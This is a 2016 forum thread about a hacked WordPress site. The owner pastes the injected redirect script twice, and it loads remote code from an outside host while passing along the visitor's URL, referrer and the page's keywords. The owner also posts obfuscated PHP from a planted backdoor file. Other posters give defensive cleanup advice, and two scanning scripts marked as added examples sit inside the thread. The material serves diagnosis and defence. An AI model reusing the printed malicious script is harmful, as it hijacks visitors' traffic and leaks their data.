GoFuckYourself.com - Adult Webmaster Forum

Scripts inserted in my WP themes header (https://gfy.com/showthread.php?t=1227874)

ravenazrael 11-09-2016 08:17 AM

Scripts inserted in my WP themes header
 
Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times, got hosting to scan the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Brian mike 11-09-2016 08:42 AM

Quote:

Originally Posted by ravenazrael (Post 21286612)
Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times, got hosting to scan the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Do you use an ad network? I mean, are you a publisher? This could be the way they get into your site.
Without accusing any company, you should look into this too.

Fetish Gimp 11-09-2016 09:14 AM

I would suggest:
  • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
  • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
  • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
  • Change your FTP user/passwords.

Check out these links on making Wordpress more secure:
https://codex.wordpress.org/Hardening_WordPress
Securing WordPress: Hardening Basics | The State of Security
https://www.wordfence.com/learn/how-...rdpress-sites/

ravenazrael 11-09-2016 09:33 AM

Thanks. Everything started when I used an ad network's script months ago, then stopped, then cleaned the whole site, but it has been returning many, many times.

All plugins are from the WP repository. The problem is that the issue happens every day or every two days, so a test running without one plugin per day may end like next year, and it may still harm the website.
The 3 admins are me and the developers I had to hire to fix the issue. No one else has logged in to the site as admin in the past weeks.

Is there a way to block scripts?

Brian mike 11-09-2016 09:40 AM

Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc ... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. :) I mean we have discovered Hacked file with the above URL or similar.

Also check the webmaster tools USER owner property, to see if anyone new has been added as owner. Been hacked this way before.

ravenazrael 11-09-2016 11:32 AM

Quote:

Originally Posted by Brian mike (Post 21286942)
Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc ... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. :) I mean we have discovered Hacked file with the above URL or similar.

Also check the webmaster tools USER owner property, to see if anyone new has been added as owner. Been hacked this way before.

nope, none of them show anything

Colmike9 11-09-2016 11:35 AM

Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:

ravenazrael 11-09-2016 11:38 AM

Quote:

Originally Posted by Colmike7 (Post 21287356)
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:

I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?

Brian mike 11-09-2016 11:44 AM

Quote:

Originally Posted by ravenazrael (Post 21287362)
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?

Talk to Roby https://gfy.com/business-services/122...l#post21246502

At this point if your tech can't fix it try another one mate. Or worst case change Theme. :thumbsup

Good Luck and keep us posted :)

Colmike9 11-09-2016 11:54 AM

Quote:

Originally Posted by ravenazrael (Post 21287362)
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?

I have one way to block the script without removing it, but it's stupid so I won't post it..


Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

Hope this helps.

Brian mike 11-09-2016 11:59 AM

Colmike your link is VIrusssssssssssss

DON'T CLICK THIS LINK, see below why

https://s16.postimg.org/qz1f1s991/Untitled.jpg

Colmike9 11-09-2016 12:04 PM

Quote:

Originally Posted by Brian mike (Post 21287422)
Colmike your link is VIrusssssssssssss

DON'T CLICK THIS LINK, see below why

https://s16.postimg.org/qz1f1s991/Untitled.jpg

I removed it, but that was just sucuri.net showing the malware in plain text.

ravenazrael 11-09-2016 01:03 PM

ok thanks.. will let you know if something of this works out

Google Expert 11-09-2016 01:13 PM

We used to have exactly the same thing. Even managed to track the fucking Russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

ravenazrael 11-09-2016 01:30 PM

Quote:

Originally Posted by Google Expert (Post 21287599)
We used to have exactly the same thing. Even managed to track the fucking Russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

thanks. I'll need to get someone to do that.

Bama 11-09-2016 02:09 PM

If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

Relic 11-09-2016 02:13 PM

That's what you get for not keeping software up to date, op.

PornAffiliate 11-09-2016 02:25 PM

You probably already have tried some malware plugins - but if you haven't tried this one I would give it a go: https://wordpress.org/plugins/gotmls/

ravenazrael 11-09-2016 08:45 PM

Thanks guys and thanks for the recommendations.
As I am not tech savvy and the person helping me is MIA, I tried to find the issue myself.
What is the dirs.php file supposed to do?
I think that is one of the issues. It has crap like this one:
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));

ravenazrael 11-09-2016 09:34 PM

What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

Fetish Gimp 11-09-2016 09:58 PM

Quote:

Originally Posted by ravenazrael (Post 21288850)
What is the dirs.php file supposed to do?
I think that is one of the issues. It has crap like this one:
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));

Wordpress itself does not have any such file.

If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

I would suggest trying this, in this order:
  1. Change all your server-related user/passwords (ftp/cpanel, ssh)
  2. Change all your Wordpress passwords
  3. Delete the dirs.php file you found

If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.

Colmike9 11-09-2016 10:36 PM

Quote:

Originally Posted by ravenazrael (Post 21288916)
What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

Probably a bot checking sites for backdoors and/or other vulnerabilities..

There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.

lezinterracial 11-09-2016 11:48 PM

Quote:

Originally Posted by ravenazrael (Post 21288916)
What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png

That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" if you want to fix this error. You may want to look for your hack though.



Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.

jscott 11-10-2016 01:56 AM

ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

https://aw-snap.info/file-viewer/
I found this online website scanning tool very helpful

This is a terrible, terrible thing :( Good luck getting it fixed

ravenazrael 11-10-2016 02:07 AM

Thanks to everybody!
Yes, it has been hitting me for months and it looked normal for a while. My traffic has gone to 1/3 now.

just a punk 11-10-2016 02:15 AM

Quote:

Originally Posted by Bama (Post 21287839)
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.

ravenazrael 11-10-2016 06:59 AM

Quote:

Originally Posted by CyberSEO (Post 21289216)
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.

All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(

Brian mike 11-10-2016 07:20 AM

Quote:

Originally Posted by ravenazrael (Post 21289759)
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(

Blame Donald Trump :winkwink: (Joke aside, trying to make you smile for 5 sec.) :) I feel you mate, do you think it's time to wipe out?

I have my part of problems also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr.

At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out.

ravenazrael 11-10-2016 09:14 AM

Quote:

Originally Posted by Brian mike (Post 21289792)
Blame Donald Trump :winkwink: (Joke aside, trying to make you smile for 5 sec.) :) I feel you mate, do you think it's time to wipe out?

I have my part of problems also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr.

At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out.

by wipe out you mean the whole site and content?? =(

Fetish Gimp 11-10-2016 10:16 AM

Quote:

Originally Posted by ravenazrael (Post 21290125)
by wipe out you mean the whole site and content?? =(

I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
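
Added example, not part of the post above: one way to run the database search it describes, offline against a SQL dump. The function names, the pattern list and the sample rows are assumptions made up for illustration; the `__cfgoid` and `jquery.min.php` strings come from the script sample posted at the top of this thread.

```shell
#!/bin/sh
# Added example: list database rows that carry script tags or strings from the
# injected header script. Assumes a dump with one row per INSERT line, e.g.
#   mysqldump --skip-extended-insert DBNAME > dump.sql
# Function names and the pattern list are assumptions for illustration.

db_script_hits() {  # usage: db_script_hits DUMP.sql  ->  "table first_column"
    awk '
        /^INSERT INTO `/ {
            row = tolower($0)
            # script tags plus strings seen in the sample from this thread
            if (row ~ /<script|__cfgoid|jquery\.min\.php/) {
                split($0, part, "`")               # part[2] is the table name
                rest = substr($0, index($0, "VALUES (") + 8)
                id = substr(rest, 1, index(rest, ",") - 1)
                print part[2], id
            }
        }
    ' "$1" | sort
}

# Constructed sample rows for trying the check offline (not real site data).
write_sample_dump() {  # usage: write_sample_dump FILE
    cat > "$1" <<'EOF'
INSERT INTO `wp_options` VALUES (1,'siteurl','http://example.test','yes');
INSERT INTO `wp_options` VALUES (412,'widget_text','<script>setCookie(\"__cfgoid\",1,1)</script>','yes');
INSERT INTO `wp_posts` VALUES (7,1,'2016-11-09 08:17:00','Hello <b>world</b>');
INSERT INTO `wp_posts` VALUES (9,1,'2016-11-09 08:20:00','text <SCRIPT src=x></SCRIPT>');
EOF
}

# Run only when a dump path is given, e.g.: sh dbscan.sh dump.sql
if [ "$#" -gt 0 ]; then db_script_hits "$1"; fi
```

Each output line is a table name and the first column of a matching row. Legitimate widgets and embeds also contain script tags, so the list is a set of rows to review by hand.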

ravenazrael 11-10-2016 10:28 AM

Quote:

Originally Posted by Fetish Gimp (Post 21290299)
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.

thanks. well that was done before... two months ago.. and the problem persisted

ravenazrael 11-13-2016 05:47 PM

seems it is finally solved. thanks to you all!

jscott 11-14-2016 12:06 AM

oh it's never solved :(

klinton 11-14-2016 02:17 AM

so how did you fix it ? :)
Quote:

Originally Posted by ravenazrael (Post 21298330)
seems it is finally solved. thanks to you all!


PornDiscounts-V 11-14-2016 02:22 AM

They may likely have made many backdoor shells. Best bet is to format, then import only posts from the old database on a fresh install.

MichaelA2014 11-14-2016 09:33 PM

Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.

j3rkules 11-15-2016 04:43 AM

Quote:

Originally Posted by klinton (Post 21298855)
so how did you fix it ? :)

I am also curious after reading all of this.

Google Expert 11-15-2016 05:37 AM

Quote:

Originally Posted by ravenazrael (Post 21289759)
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(

I already told you. The script infected all your server.

You need to format the HDD and do a clean OS install.

Other than this, nothing will help.

Paz 11-15-2016 07:11 AM

Quote:

Originally Posted by Google Expert (Post 21301891)
I already told you. The script infected all your server.

You need to format the HDD and do a clean OS install.

Other than this, nothing will help.

This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

ravenazrael 11-15-2016 07:53 AM

Quote:

Originally Posted by Paz (Post 21302011)
This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

yep.. that is what worked.. so far
I actually never downloaded any plugin or script from BHW. I remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was a coincidence.

ErectMedia 11-15-2016 04:24 PM

Basics....

https://ithemes.com/2016/10/13/how-t...ly-and-easily/

Good plugin...

https://wordpress.org/plugins/all-in...-and-firewall/

If that doesn't do it, you could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare is more popular and a good CDN, but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan. :2 cents:

Shoplifter 11-15-2016 04:56 PM

It is possible to clean out a hacked Wordpress setup and indeed I have done it.

One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going: one is the actual backdoor that allows him to place files on your server, another is the scripts that they use to send spam emails, and the third is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to do it's a lot easier to prevent it.

It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.
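
Added example, not part of the post above: a triage script that combines the `find ... -mtime -2` check with other checks suggested in this thread (PHP files in the uploads folder, the file names jquery.min.php, dirs.php and .ftpquote, and strings from the two code samples posted here). The function names, the obfuscation pattern and the sample tree are assumptions made up for illustration.

```shell
#!/bin/sh
# Added example: triage a WordPress tree for the signs discussed in this thread.
# Function names and the ROOT argument are assumptions for illustration.

# Strings taken from the header script sample posted in this thread.
JS_MARKERS='__cfgoid|jquery\.min\.php'
# Heuristic for dirs.php-style code: variable names built by calls, ${Func("...")}.
PHP_OBFUSCATION='\$\{[A-Za-z0-9_]+\("'

# PHP/JS files changed in the last DAYS days (the find -mtime check above).
recent_files() {  # usage: recent_files ROOT DAYS
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) -mtime "-$2" -print
}

# PHP files under uploads; a media folder should not contain code.
php_in_uploads() {  # usage: php_in_uploads ROOT
    [ -d "$1/wp-content/uploads" ] || return 0
    find "$1/wp-content/uploads" -type f -name '*.php' -print
}

# File names mentioned in this thread as fake or unexpected.
odd_names() {  # usage: odd_names ROOT
    find "$1" -type f \( -name 'jquery.min.php' -o -name 'dirs.php' \
        -o -name '.ftpquote' \) -print
}

# Files whose content matches an extended regular expression.
content_hits() {  # usage: content_hits ROOT ERE
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.html' \) \
        -exec grep -lE "$2" {} + 2>/dev/null || true
}

triage() {  # usage: triage ROOT [DAYS]
    echo "== changed in last ${2:-2} days";  recent_files "$1" "${2:-2}"
    echo "== PHP under uploads";             php_in_uploads "$1"
    echo "== unexpected file names";         odd_names "$1"
    echo "== injected script markers";       content_hits "$1" "$JS_MARKERS"
    echo "== obfuscated PHP (heuristic)";    content_hits "$1" "$PHP_OBFUSCATION"
}

# Constructed sample tree for trying the checks offline (not real site data).
make_sample_tree() {  # usage: make_sample_tree DIR
    mkdir -p "$1/wp-content/uploads/2016/11" "$1/wp-content/themes/x"
    printf '<?php // clean\n' > "$1/index.php"
    touch -t 201601010000 "$1/index.php"      # old file, outside the window
    printf '<script>null==getCookie("__cfgoid")</script>\n' \
        > "$1/wp-content/themes/x/header.php"
    printf '<?php ${S8("a")} = $content;\n' > "$1/dirs.php"
    printf '<?php echo 1;\n' > "$1/wp-content/uploads/2016/11/img.php"
}

# Run only when a path is given, e.g.: sh triage.sh /pathtoyourfiles/yourblog.com
if [ "$#" -gt 0 ]; then triage "$@"; fi
```

Every hit is a file to open and read, not a verdict; a theme or plugin update also changes modification times.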

ravenazrael 11-15-2016 07:44 PM

thank you! I hope all this also helps somebody else who may have similar issues in the future

Google Expert 11-15-2016 09:23 PM

Quote:

Originally Posted by Paz (Post 21302011)
This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

Do you understand that he injected the code everywhere outside of WordPress?

We had spent 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

P.S.
they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.


All times are GMT -7.